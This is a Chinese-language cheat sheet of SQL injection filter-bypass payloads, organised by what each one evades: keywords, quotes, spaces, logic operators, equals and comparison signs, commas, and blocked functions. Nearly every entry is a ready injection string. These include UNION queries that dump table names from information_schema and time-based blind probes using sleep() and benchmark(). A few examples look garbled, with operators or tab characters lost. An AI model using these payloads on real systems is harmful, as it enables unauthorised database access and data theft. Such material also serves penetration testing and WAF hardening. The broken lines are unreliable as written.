SQL注入绕过方法目录
- SQL注入绕过方法
- 一、绕过关键字
- 二、绕过引号
- 三、绕过空格
- 四、绕过逻辑符号
- 五、绕过等号
- 六、绕过大小于等于号
- 七、绕过逗号
- 八、绕过函数
参考:
https://blog.csdn.net/zizizizizi_/article/details/124094197
http://wed.xjx100.cn/news/143416.html?action=onClick
一、绕过关键字
1、大小写绕过
举例:
-1' UniOn SelEct 1,2#
2、双写绕过
举例:
-1' uniunionon seselectlect 1,2#
3、URL编码绕过
举例:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23?id=-1'+union+select+1%2C2%23url解码:?id=-1' union select 1,2#
4、内联注释绕过
举例:
-1' /*!union*/ /*!select*/ 1,2#
二、绕过引号
1、16进制编码绕过
举例:
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#
2、URL编码绕过
举例:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23url解码:?id=-1' union select 1,2#
3、ASCII编码绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=concat(CHAR(100),CHAR(118),CHAR(119),CHAR(97))#
4、宽字节绕过
-1%df' union select 1,2--+
三、绕过空格
1、注释符绕过
举例:
-1'/**/union/**/select/**/1,2#
2、内联注释绕过
-1'/*!*/union/*!*/select/*!*/1,2#
3、括号绕过
-1' union(select(1),(2))#
4、tab键绕过
-1'unionselect1,2#
5、两个空格绕过
-1' union select 1,2#
四、绕过逻辑符号
1、and绕过
1' & 1=1#
1' && 1=1#
2、or绕过
1' || 1=1#
3、not绕过
1' and 1!=2#
五、绕过等号
原型
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
1、like绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema like database()#
2、rlike绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema rlike database()#
3、regexp绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema regexp database()#
4、大小于号绕过
-1' union select 1,group_concat(table_name) from information_schema.tables where !(table_schemadatabase())#
六、绕过大小于等于号
原型
1' and if(ascii(substr(database(),1,1))>100,sleep(2),0)#
1、greatest、least绕过
greatest():greatest(n1, n2, n3…):返回n中的最大值1' and if(greatest(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#
least():least(n1,n2,n3…):返回n中的最小值1' and if(least(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#
2、strcmp绕过
strcmp():strcmp(str1,str2):若所有的字符串均相同,则返回0,若根据当前分类次序,第一个参数小于第二个,则返回-1,其它情况返回11' and if(strcmp(ascii(substr(database(),1,1)),100)=0,sleep(2),0)#
3、in关键字绕过
1' and if(ascii(substr(database(),1,1)) in (100),sleep(2),0)#或1' and if(substr(database(),1,1) in ("d"),sleep(2),0)#
4、between…and..绕过
1' and if(ascii(substr(database(),1,1)) between 90 and 100,sleep(2),0)#
5、like绕过
1' and if(substr(database(),1,1) like "d%",sleep(2),0)#
七、绕过逗号
1、from pos for len,其中pos代表从pos个开始读取len长度的子串
1' and if(ascii(substr(database() from 1 for 1))=100,sleep(2),0)#
2、join关键字绕过
-1' union select * from (select 1)a join (select 2)b#
3、like关键字绕过
1' and if(database() like "%d%",sleep(2),0)#
4、offset关键字
1' union select 1,2 limit 1 offset 0#等价1' union select 1,2 limit 0,1#
八、绕过函数
1、绕过sleep()
(1)benchmark函数
benchmark():第一个参数代表执行次数,第二个参数代表执行表达式1' and benchmark(1000000000,1)#
2、绕过ascii()
(1)bin函数
bin():转换成二进制数1' and if(bin(ascii(substr(database(),1,1)))=1100100,sleep(2),1)#
(2)hex函数
hex():转换成十六进制数1' and if(hex(substr(database(),1,1))=64,sleep(2),1)#
(3)ord函数
ord():给定的字符串,其最左边的字符代码将被查找1' and if(ord(substr(database(),1,1))=100,sleep(2),1)#
3、绕过group_concat()
(1)concat_ws函数
concat_ws(分隔符,str1,str2):-1' union select 1,concat_ws(",","@",table_name) from information_schema.tables where table_schema=database()#
(2)concat函数
concat():-1' union select 1,concat(table_name) from information_schema.tables where table_schema=database()#
4、绕过substr()
(1)substring函数
substring(str,pos,len):1' and if(substring(database(),1,1)="d",sleep(2),1)#
(2)mid函数
mid(str,pos,len):1' and if(mid(database(),1,1)="d",sleep(2),1)#
(3)left函数
left(str,len):1' and if(left(database(),1)="d",sleep(2),1)#
(4)right函数
right(str,len):1' and if(right(database(),1)="a",sleep(2),1)#